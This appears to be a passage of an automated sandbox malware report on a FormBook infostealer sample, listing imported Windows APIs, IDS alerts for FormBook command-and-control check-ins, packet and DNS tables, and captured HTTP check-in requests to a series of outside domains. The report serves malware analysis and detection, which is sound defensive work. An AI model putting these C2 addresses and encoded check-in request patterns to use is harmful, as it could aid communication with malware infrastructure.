                                                                  KERNEL32.dllCloseHandle, SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, lstrcmpiA, ExitProcess, GetCommandLineA, GetWindowsDirectoryA, GetTempPathA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpA, GetEnvironmentVariableA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
                                                                  USER32.dllScreenToClient, GetWindowRect, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, TrackPopupMenu, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                  GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                  SHELL32.dllSHGetMalloc, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                  ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                  COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                  ole32.dllOleInitialize, OleUninitialize, CoCreateInstance
                                                                  VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                  Possible Origin

                                                                  Language of compilation systemCountry where language is spokenMap
                                                                  EnglishUnited States

                                                                  Network Behavior

                                                                  Snort IDS Alerts

                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                  04/08/21-11:06:58.048885TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972480192.168.2.323.227.38.74
                                                                  04/08/21-11:06:58.048885TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972480192.168.2.323.227.38.74
                                                                  04/08/21-11:06:58.048885TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972480192.168.2.323.227.38.74
                                                                  04/08/21-11:06:58.188266TCP1201ATTACK-RESPONSES 403 Forbidden804972423.227.38.74192.168.2.3

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Apr 8, 2021 11:06:52.773000956 CEST4972380192.168.2.367.205.188.68
                                                                  Apr 8, 2021 11:06:52.879992962 CEST804972367.205.188.68192.168.2.3
                                                                  Apr 8, 2021 11:06:52.880206108 CEST4972380192.168.2.367.205.188.68
                                                                  Apr 8, 2021 11:06:52.880374908 CEST4972380192.168.2.367.205.188.68
                                                                  Apr 8, 2021 11:06:52.985687017 CEST804972367.205.188.68192.168.2.3
                                                                  Apr 8, 2021 11:06:52.985718966 CEST804972367.205.188.68192.168.2.3
                                                                  Apr 8, 2021 11:06:52.985733986 CEST804972367.205.188.68192.168.2.3
                                                                  Apr 8, 2021 11:06:52.986033916 CEST4972380192.168.2.367.205.188.68
                                                                  Apr 8, 2021 11:06:52.986186028 CEST4972380192.168.2.367.205.188.68
                                                                  Apr 8, 2021 11:06:53.091460943 CEST804972367.205.188.68192.168.2.3
                                                                  Apr 8, 2021 11:06:58.036025047 CEST4972480192.168.2.323.227.38.74
                                                                  Apr 8, 2021 11:06:58.047981024 CEST804972423.227.38.74192.168.2.3
                                                                  Apr 8, 2021 11:06:58.048360109 CEST4972480192.168.2.323.227.38.74
                                                                  Apr 8, 2021 11:06:58.048885107 CEST4972480192.168.2.323.227.38.74
                                                                  Apr 8, 2021 11:06:58.061003923 CEST804972423.227.38.74192.168.2.3
                                                                  Apr 8, 2021 11:06:58.188266039 CEST804972423.227.38.74192.168.2.3
                                                                  Apr 8, 2021 11:06:58.188327074 CEST804972423.227.38.74192.168.2.3
                                                                  Apr 8, 2021 11:06:58.188365936 CEST804972423.227.38.74192.168.2.3
                                                                  Apr 8, 2021 11:06:58.188404083 CEST804972423.227.38.74192.168.2.3
                                                                  Apr 8, 2021 11:06:58.188433886 CEST804972423.227.38.74192.168.2.3
                                                                  Apr 8, 2021 11:06:58.188469887 CEST804972423.227.38.74192.168.2.3
                                                                  Apr 8, 2021 11:06:58.188479900 CEST4972480192.168.2.323.227.38.74
                                                                  Apr 8, 2021 11:06:58.188499928 CEST804972423.227.38.74192.168.2.3
                                                                  Apr 8, 2021 11:06:58.188508987 CEST4972480192.168.2.323.227.38.74
                                                                  Apr 8, 2021 11:06:58.188664913 CEST4972480192.168.2.323.227.38.74
                                                                  Apr 8, 2021 11:06:58.188685894 CEST4972480192.168.2.323.227.38.74
                                                                  Apr 8, 2021 11:07:18.802865028 CEST4972780192.168.2.3163.44.185.226
                                                                  Apr 8, 2021 11:07:19.042848110 CEST8049727163.44.185.226192.168.2.3
                                                                  Apr 8, 2021 11:07:19.043051958 CEST4972780192.168.2.3163.44.185.226
                                                                  Apr 8, 2021 11:07:19.043236971 CEST4972780192.168.2.3163.44.185.226
                                                                  Apr 8, 2021 11:07:19.283190966 CEST8049727163.44.185.226192.168.2.3
                                                                  Apr 8, 2021 11:07:19.424396992 CEST8049727163.44.185.226192.168.2.3
                                                                  Apr 8, 2021 11:07:19.424421072 CEST8049727163.44.185.226192.168.2.3
                                                                  Apr 8, 2021 11:07:19.424603939 CEST4972780192.168.2.3163.44.185.226
                                                                  Apr 8, 2021 11:07:19.424669027 CEST4972780192.168.2.3163.44.185.226
                                                                  Apr 8, 2021 11:07:19.666783094 CEST8049727163.44.185.226192.168.2.3
                                                                  Apr 8, 2021 11:07:34.850683928 CEST4973580192.168.2.3103.97.19.74
                                                                  Apr 8, 2021 11:07:35.112793922 CEST8049735103.97.19.74192.168.2.3
                                                                  Apr 8, 2021 11:07:35.112925053 CEST4973580192.168.2.3103.97.19.74
                                                                  Apr 8, 2021 11:07:35.113116980 CEST4973580192.168.2.3103.97.19.74
                                                                  Apr 8, 2021 11:07:35.374846935 CEST8049735103.97.19.74192.168.2.3
                                                                  Apr 8, 2021 11:07:35.378310919 CEST8049735103.97.19.74192.168.2.3
                                                                  Apr 8, 2021 11:07:35.378349066 CEST8049735103.97.19.74192.168.2.3
                                                                  Apr 8, 2021 11:07:35.378587961 CEST4973580192.168.2.3103.97.19.74
                                                                  Apr 8, 2021 11:07:35.378706932 CEST4973580192.168.2.3103.97.19.74
                                                                  Apr 8, 2021 11:07:35.640600920 CEST8049735103.97.19.74192.168.2.3
                                                                  Apr 8, 2021 11:07:40.472934961 CEST4973680192.168.2.391.236.136.12
                                                                  Apr 8, 2021 11:07:43.468976021 CEST4973680192.168.2.391.236.136.12
                                                                  Apr 8, 2021 11:07:49.485086918 CEST4973680192.168.2.391.236.136.12
                                                                  Apr 8, 2021 11:08:04.028669119 CEST4973980192.168.2.391.236.136.12
                                                                  Apr 8, 2021 11:08:05.017740011 CEST4973980192.168.2.391.236.136.12
                                                                  Apr 8, 2021 11:08:07.018599987 CEST4973980192.168.2.391.236.136.12

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Apr 8, 2021 11:05:53.838248014 CEST5128153192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:05:53.850294113 CEST53512818.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:05:54.767462015 CEST4919953192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:05:54.780088902 CEST53491998.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:05:55.576936960 CEST5062053192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:05:55.588898897 CEST53506208.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:05:55.994364023 CEST6493853192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:05:56.013240099 CEST53649388.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:05:56.528630018 CEST6015253192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:05:56.542135954 CEST53601528.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:05:57.762985945 CEST5754453192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:05:57.775489092 CEST53575448.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:05:58.579436064 CEST5598453192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:05:58.592372894 CEST53559848.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:05:59.691778898 CEST6418553192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:05:59.704427004 CEST53641858.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:06:00.540122986 CEST6511053192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:06:00.553318977 CEST53651108.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:06:07.722784996 CEST5836153192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:06:07.735291958 CEST53583618.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:06:08.512624025 CEST6349253192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:06:08.525321007 CEST53634928.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:06:10.533579111 CEST6083153192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:06:10.545670033 CEST53608318.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:06:12.219556093 CEST6010053192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:06:12.232131958 CEST53601008.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:06:20.887840033 CEST5319553192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:06:20.901355982 CEST53531958.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:06:21.856024027 CEST5014153192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:06:21.868674040 CEST53501418.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:06:23.518732071 CEST5302353192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:06:23.530659914 CEST53530238.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:06:25.031708956 CEST4956353192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:06:25.044179916 CEST53495638.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:06:26.322977066 CEST5135253192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:06:26.335850954 CEST53513528.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:06:29.802376032 CEST5934953192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:06:29.814527035 CEST53593498.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:06:30.186429977 CEST5708453192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:06:30.209305048 CEST53570848.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:06:43.873467922 CEST5882353192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:06:43.886384010 CEST53588238.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:06:47.333250046 CEST5756853192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:06:47.551381111 CEST53575688.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:06:49.034631014 CEST5054053192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:06:49.048317909 CEST53505408.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:06:52.563858986 CEST5436653192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:06:52.765392065 CEST53543668.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:06:58.004676104 CEST5303453192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:06:58.033833981 CEST53530348.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:06:58.706139088 CEST5776253192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:06:58.724343061 CEST53577628.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:07:03.231091022 CEST5543553192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:07:03.430695057 CEST53554358.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:07:13.456182003 CEST5071353192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:07:13.498326063 CEST53507138.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:07:15.255613089 CEST5613253192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:07:15.282083035 CEST53561328.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:07:18.552443981 CEST5898753192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:07:18.801412106 CEST53589878.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:07:19.747328997 CEST5657953192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:07:19.760103941 CEST53565798.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:07:22.796905994 CEST6063353192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:07:22.815566063 CEST53606338.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:07:24.441622972 CEST6129253192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:07:24.470289946 CEST53612928.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:07:29.488107920 CEST6361953192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:07:29.514267921 CEST53636198.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:07:34.569546938 CEST6493853192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:07:34.848860025 CEST53649388.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:07:40.396531105 CEST6194653192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:07:40.471549034 CEST53619468.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:07:55.034406900 CEST6491053192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:07:55.046662092 CEST53649108.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:07:57.276434898 CEST5212353192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:07:57.309338093 CEST53521238.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:08:03.825078964 CEST5613053192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:08:04.001548052 CEST53561308.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:08:06.507342100 CEST5633853192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:08:06.543065071 CEST53563388.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:08:11.941447973 CEST5942053192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:08:11.968172073 CEST53594208.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:08:17.192883968 CEST5878453192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:08:17.215616941 CEST53587848.8.8.8192.168.2.3

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                  Apr 8, 2021 11:06:47.333250046 CEST192.168.2.38.8.8.80x7449Standard query (0)www.rainbowsdepot.comA (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:06:52.563858986 CEST192.168.2.38.8.8.80xc92bStandard query (0)www.mywinnersworld.comA (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:06:58.004676104 CEST192.168.2.38.8.8.80x2eb4Standard query (0)www.gracieleesgiftsandmore.comA (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:07:03.231091022 CEST192.168.2.38.8.8.80xca4aStandard query (0)www.ezmodafinil.comA (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:07:13.456182003 CEST192.168.2.38.8.8.80x5abeStandard query (0)www.orgoneartist.comA (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:07:18.552443981 CEST192.168.2.38.8.8.80x3dceStandard query (0)www.tonton-koubou.comA (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:07:24.441622972 CEST192.168.2.38.8.8.80x76dbStandard query (0)www.hatikuturkila.comA (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:07:29.488107920 CEST192.168.2.38.8.8.80x3e06Standard query (0)www.th0rgramm.comA (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:07:34.569546938 CEST192.168.2.38.8.8.80xe4dcStandard query (0)www.phillhutt.comA (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:07:40.396531105 CEST192.168.2.38.8.8.80x10f9Standard query (0)www.formula-kuhni.comA (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:08:03.825078964 CEST192.168.2.38.8.8.80x755dStandard query (0)www.formula-kuhni.comA (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:08:06.507342100 CEST192.168.2.38.8.8.80x5434Standard query (0)www.thelitigatorsbookclub.comA (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:08:11.941447973 CEST192.168.2.38.8.8.80x80Standard query (0)www.apettelp.clubA (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:08:17.192883968 CEST192.168.2.38.8.8.80xf08cStandard query (0)www.jjwheelerphotography.comA (IP address)IN (0x0001)

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                  Apr 8, 2021 11:06:47.551381111 CEST8.8.8.8192.168.2.30x7449Server failure (2)www.rainbowsdepot.comnonenoneA (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:06:52.765392065 CEST8.8.8.8192.168.2.30xc92bNo error (0)www.mywinnersworld.com67.205.188.68A (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:06:58.033833981 CEST8.8.8.8192.168.2.30x2eb4No error (0)www.gracieleesgiftsandmore.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                  Apr 8, 2021 11:06:58.033833981 CEST8.8.8.8192.168.2.30x2eb4No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:07:03.430695057 CEST8.8.8.8192.168.2.30xca4aServer failure (2)www.ezmodafinil.comnonenoneA (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:07:13.498326063 CEST8.8.8.8192.168.2.30x5abeName error (3)www.orgoneartist.comnonenoneA (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:07:18.801412106 CEST8.8.8.8192.168.2.30x3dceNo error (0)www.tonton-koubou.com163.44.185.226A (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:07:24.470289946 CEST8.8.8.8192.168.2.30x76dbName error (3)www.hatikuturkila.comnonenoneA (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:07:29.514267921 CEST8.8.8.8192.168.2.30x3e06Name error (3)www.th0rgramm.comnonenoneA (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:07:34.848860025 CEST8.8.8.8192.168.2.30xe4dcNo error (0)www.phillhutt.com103.97.19.74A (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:07:40.471549034 CEST8.8.8.8192.168.2.30x10f9No error (0)www.formula-kuhni.com91.236.136.12A (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:08:04.001548052 CEST8.8.8.8192.168.2.30x755dNo error (0)www.formula-kuhni.com91.236.136.12A (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:08:06.543065071 CEST8.8.8.8192.168.2.30x5434No error (0)www.thelitigatorsbookclub.comthelitigatorsbookclub.comCNAME (Canonical name)IN (0x0001)
                                                                  Apr 8, 2021 11:08:06.543065071 CEST8.8.8.8192.168.2.30x5434No error (0)thelitigatorsbookclub.com184.168.131.241A (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:08:11.968172073 CEST8.8.8.8192.168.2.30x80No error (0)www.apettelp.clubapettelp.clubCNAME (Canonical name)IN (0x0001)
                                                                  Apr 8, 2021 11:08:11.968172073 CEST8.8.8.8192.168.2.30x80No error (0)apettelp.club95.215.210.10A (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:08:17.215616941 CEST8.8.8.8192.168.2.30xf08cNo error (0)www.jjwheelerphotography.comjjwheelerphotography.comCNAME (Canonical name)IN (0x0001)
                                                                  Apr 8, 2021 11:08:17.215616941 CEST8.8.8.8192.168.2.30xf08cNo error (0)jjwheelerphotography.com192.0.78.24A (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:08:17.215616941 CEST8.8.8.8192.168.2.30xf08cNo error (0)jjwheelerphotography.com192.0.78.25A (IP address)IN (0x0001)

                                                                  HTTP Request Dependency Graph

                                                                  • www.mywinnersworld.com
                                                                  • www.gracieleesgiftsandmore.com
                                                                  • www.tonton-koubou.com
                                                                  • www.phillhutt.com

                                                                  HTTP Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  0192.168.2.34972367.205.188.6880C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Apr 8, 2021 11:06:52.880374908 CEST1174OUTGET /hx3a/?tZUT=0fll8pJq7ZAUibPF4kinhno6RtSSoQWPS25LacVc9zIksnHvjqyKkUnVN9tOTAaZP4N+&9r98J=FbY8OBD HTTP/1.1
                                                                  Host: www.mywinnersworld.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Apr 8, 2021 11:06:52.985718966 CEST1175INHTTP/1.1 301 Moved Permanently
                                                                  Server: nginx/1.14.0 (Ubuntu)
                                                                  Date: Thu, 08 Apr 2021 09:06:52 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 194
                                                                  Connection: close
                                                                  Location: https://www.mywinnersworld.com/hx3a/?tZUT=0fll8pJq7ZAUibPF4kinhno6RtSSoQWPS25LacVc9zIksnHvjqyKkUnVN9tOTAaZP4N+&9r98J=FbY8OBD
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  1192.168.2.34972423.227.38.7480C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Apr 8, 2021 11:06:58.048885107 CEST1176OUTGET /hx3a/?tZUT=3J4IwxDxyQGM57lngVTovpY0RYYybvKdXCCorOYcpgj/2IXBVenraHtymYKqlnAzAiYz&9r98J=FbY8OBD HTTP/1.1
                                                                  Host: www.gracieleesgiftsandmore.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Apr 8, 2021 11:06:58.188266039 CEST1177INHTTP/1.1 403 Forbidden
                                                                  Date: Thu, 08 Apr 2021 09:06:58 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  X-Sorting-Hat-PodId: 154
                                                                  X-Sorting-Hat-ShopId: 44749029531
                                                                  X-Dc: gcp-us-east1
                                                                  X-Request-ID: 2df77edf-6e63-4f5a-9d73-69255bdc7913
                                                                  Set-Cookie: _shopify_fs=2021-04-08T09%3A06%3A58Z; Expires=Fri, 08-Apr-22 09:06:58 GMT; Domain=gracieleesgiftsandmore.com; Path=/; SameSite=Lax
                                                                  X-Content-Type-Options: nosniff
                                                                  X-Permitted-Cross-Domain-Policies: none
                                                                  X-XSS-Protection: 1; mode=block
                                                                  X-Download-Options: noopen
                                                                  CF-Cache-Status: DYNAMIC
                                                                  cf-request-id: 095255278a0000233d520e6000000001
                                                                  Server: cloudflare
                                                                  CF-RAY: 63ca57b8dc76233d-ZRH
                                                                  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                  Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39
                                                                  Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9
                                                                  Apr 8, 2021 11:06:58.188327074 CEST1179INData Raw: 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e
                                                                  Data Ascii: }h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bott
